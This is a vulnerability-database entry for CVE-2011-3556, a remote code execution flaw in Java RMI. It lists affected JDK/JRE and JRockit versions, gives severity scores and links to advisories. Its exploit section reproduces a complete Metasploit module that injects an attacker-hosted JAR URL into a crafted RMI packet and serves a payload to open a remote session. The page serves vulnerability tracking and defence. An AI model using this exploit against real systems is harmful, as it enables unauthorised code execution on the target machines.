CVE-2011-3556 : Detail

CVE-2011-3556

54.64%V3
Network
2011-10-19
19h00 +00:00
2020-02-12
11h06 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI, a different vulnerability than CVE-2011-3557.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17535

Publication date : 2011-07-14 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: java_rmi_server.rb 13186 2011-07-15 20:44:08Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Java RMI Server Insecure Default Configuration Java Code Execution', 'Description' => %q{ This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication. }, 'Author' => [ 'mihi' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 13186 $', 'References' => [ # RMI protocol specification [ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'], ], 'Platform' => ['java', 'win', 'osx', 'linux', 'solaris'], 'Privileged' => true, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ] ], 'DefaultTarget' => 1 )) register_options( [ Opt::RPORT(1099) ], self.class) end def exploit start_service() connect jar = rand_text_alpha(rand(8)+1) + '.jar' old_url = "file:./rmidummy.jar" new_url = get_uri + '/' + jar packet = gen_rmi_packet # Java strings in serialized data are prefixed with a 2-byte, big endian length # (at least, as long as they are shorter than 65536 bytes) find_me = [old_url.length].pack("n") + old_url idx = packet.index(find_me) len = [new_url.length].pack("n") # Now replace it with the new url packet[idx, find_me.length] = len + new_url # write out minimal header and packet print_status("Sending request for #{new_url}") #sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet); sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet); # wait for the request to be handled while not session_created? select(nil, nil, nil, 0.25) handler() end end def on_request_uri(cli, request) if request.uri =~ /\.jar$/i p = regenerate_payload(cli) jar = p.encoded_jar paths = [ [ "metasploit", "RMILoader.class" ], [ "metasploit", "RMIPayload.class" ], ] jar.add_files(paths, [ Msf::Config.data_directory, "java" ]) send_response(cli, jar.pack, { 'Content-Type' => 'application/java-archive', 'Connection' => 'close', 'Pragma' => 'no-cache' }) print_status("Replied to Request for Payload JAR") end end def gen_rmi_packet "\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a" + "\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f" + "\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00" + "\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00" + "\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e" + "\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2" + "\xf4\x02\x00\x00\x74\x00\x13\x66\x69\x6c\x65\x3a\x2e\x2f\x72\x6d" + "\x69\x64\x75\x6d\x6d\x79\x2e\x6a\x61\x72\x78\x70\x77\x01\x00\x0a" end end

Products Mentioned

Configuraton 0

Sun>>Jdk >> Version 1.7.0

    Sun>>Jre >> Version 1.7.0

      Configuraton 0

      Oracle>>Jrockit >> Version To (including) r28.1.4

      Oracle>>Jrockit >> Version r28.0.0

      Oracle>>Jrockit >> Version r28.0.1

      Oracle>>Jrockit >> Version r28.0.2

      Oracle>>Jrockit >> Version r28.1.0

      Oracle>>Jrockit >> Version r28.1.1

      Oracle>>Jrockit >> Version r28.1.3

      Configuraton 0

      Sun>>Jdk >> Version To (including) 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

        Sun>>Jdk >> Version 1.6.0

          Sun>>Jdk >> Version 1.6.0

            Sun>>Jdk >> Version 1.6.0

              Sun>>Jdk >> Version 1.6.0

                Sun>>Jdk >> Version 1.6.0

                  Sun>>Jdk >> Version 1.6.0

                  Sun>>Jdk >> Version 1.6.0

                  Sun>>Jdk >> Version 1.6.0

                  Sun>>Jdk >> Version 1.6.0

                  Sun>>Jdk >> Version 1.6.0

                  Sun>>Jdk >> Version 1.6.0

                  Sun>>Jdk >> Version 1.6.0

                  Sun>>Jre >> Version To (including) 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                    Sun>>Jre >> Version 1.6.0

                      Sun>>Jre >> Version 1.6.0

                        Sun>>Jre >> Version 1.6.0

                          Sun>>Jre >> Version 1.6.0

                            Sun>>Jre >> Version 1.6.0

                              Sun>>Jre >> Version 1.6.0

                              Sun>>Jre >> Version 1.6.0

                              Sun>>Jre >> Version 1.6.0

                              Sun>>Jre >> Version 1.6.0

                              Sun>>Jre >> Version 1.6.0

                              Configuraton 0

                              Sun>>Jdk >> Version To (including) 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                              Sun>>Jre >> Version To (including) 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Sun>>Jre >> Version 1.5.0

                              Configuraton 0

                              Sun>>Jdk >> Version To (including) 1.4.2_33

                              Sun>>Jdk >> Version 1.4.2

                              Sun>>Jdk >> Version 1.4.2_1

                              Sun>>Jdk >> Version 1.4.2_2

                              Sun>>Jdk >> Version 1.4.2_3

                              Sun>>Jdk >> Version 1.4.2_4

                              Sun>>Jdk >> Version 1.4.2_5

                              Sun>>Jdk >> Version 1.4.2_6

                              Sun>>Jdk >> Version 1.4.2_7

                              Sun>>Jdk >> Version 1.4.2_8

                              Sun>>Jdk >> Version 1.4.2_9

                              Sun>>Jdk >> Version 1.4.2_10

                              Sun>>Jdk >> Version 1.4.2_11

                              Sun>>Jdk >> Version 1.4.2_12

                              Sun>>Jdk >> Version 1.4.2_13

                              Sun>>Jdk >> Version 1.4.2_14

                              Sun>>Jdk >> Version 1.4.2_15

                              Sun>>Jdk >> Version 1.4.2_16

                              Sun>>Jdk >> Version 1.4.2_17

                              Sun>>Jdk >> Version 1.4.2_18

                              Sun>>Jdk >> Version 1.4.2_19

                              Sun>>Jdk >> Version 1.4.2_20

                                Sun>>Jdk >> Version 1.4.2_21

                                  Sun>>Jdk >> Version 1.4.2_22

                                  Sun>>Jdk >> Version 1.4.2_23

                                  Sun>>Jdk >> Version 1.4.2_24

                                  Sun>>Jdk >> Version 1.4.2_25

                                  Sun>>Jdk >> Version 1.4.2_26

                                  Sun>>Jdk >> Version 1.4.2_27

                                  Sun>>Jdk >> Version 1.4.2_28

                                  Sun>>Jdk >> Version 1.4.2_29

                                  Sun>>Jdk >> Version 1.4.2_30

                                  Sun>>Jdk >> Version 1.4.2_31

                                  Sun>>Jdk >> Version 1.4.2_32

                                  Sun>>Jre >> Version To (including) 1.4.2_33

                                  Sun>>Jre >> Version 1.4.2

                                  Sun>>Jre >> Version 1.4.2_1

                                  Sun>>Jre >> Version 1.4.2_2

                                  Sun>>Jre >> Version 1.4.2_3

                                  Sun>>Jre >> Version 1.4.2_4

                                  Sun>>Jre >> Version 1.4.2_5

                                  Sun>>Jre >> Version 1.4.2_6

                                  Sun>>Jre >> Version 1.4.2_7

                                  Sun>>Jre >> Version 1.4.2_8

                                  Sun>>Jre >> Version 1.4.2_9

                                  Sun>>Jre >> Version 1.4.2_10

                                  Sun>>Jre >> Version 1.4.2_11

                                  Sun>>Jre >> Version 1.4.2_12

                                  Sun>>Jre >> Version 1.4.2_13

                                  Sun>>Jre >> Version 1.4.2_14

                                  Sun>>Jre >> Version 1.4.2_15

                                  Sun>>Jre >> Version 1.4.2_16

                                  Sun>>Jre >> Version 1.4.2_17

                                  Sun>>Jre >> Version 1.4.2_18

                                  Sun>>Jre >> Version 1.4.2_19

                                  Sun>>Jre >> Version 1.4.2_20

                                  Sun>>Jre >> Version 1.4.2_21

                                  Sun>>Jre >> Version 1.4.2_22

                                  Sun>>Jre >> Version 1.4.2_23

                                  Sun>>Jre >> Version 1.4.2_24

                                  Sun>>Jre >> Version 1.4.2_25

                                  Sun>>Jre >> Version 1.4.2_26

                                  Sun>>Jre >> Version 1.4.2_27

                                  Sun>>Jre >> Version 1.4.2_28

                                  Sun>>Jre >> Version 1.4.2_29

                                  Sun>>Jre >> Version 1.4.2_30

                                  Sun>>Jre >> Version 1.4.2_31

                                  Sun>>Jre >> Version 1.4.2_32

                                  References

                                  http://osvdb.org/76505
                                  Tags : vdb-entry, x_refsource_OSVDB
                                  http://www.securityfocus.com/bid/50231
                                  Tags : vdb-entry, x_refsource_BID
                                  http://security.gentoo.org/glsa/glsa-201406-32.xml
                                  Tags : vendor-advisory, x_refsource_GENTOO
                                  http://secunia.com/advisories/48692
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://marc.info/?l=bugtraq&m=134254866602253&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://marc.info/?l=bugtraq&m=133365109612558&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://secunia.com/advisories/48308
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://marc.info/?l=bugtraq&m=132750579901589&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://rhn.redhat.com/errata/RHSA-2013-1455.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://marc.info/?l=bugtraq&m=132750579901589&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://www.redhat.com/support/errata/RHSA-2011-1478.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://www.redhat.com/support/errata/RHSA-2011-1384.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://marc.info/?l=bugtraq&m=134254957702612&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://secunia.com/advisories/49198
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://www.redhat.com/support/errata/RHSA-2012-0006.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://marc.info/?l=bugtraq&m=133728004526190&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://marc.info/?l=bugtraq&m=133365109612558&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://marc.info/?l=bugtraq&m=133728004526190&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  http://www.securitytracker.com/id?1026215
                                  Tags : vdb-entry, x_refsource_SECTRACK
                                  http://www.ubuntu.com/usn/USN-1263-1
                                  Tags : vendor-advisory, x_refsource_UBUNTU
                                  http://marc.info/?l=bugtraq&m=134254957702612&w=2
                                  Tags : vendor-advisory, x_refsource_HP
                                  https://www.kb.cert.org/vuls/id/597809
                                  Tags : third-party-advisory, x_refsource_CERT-VN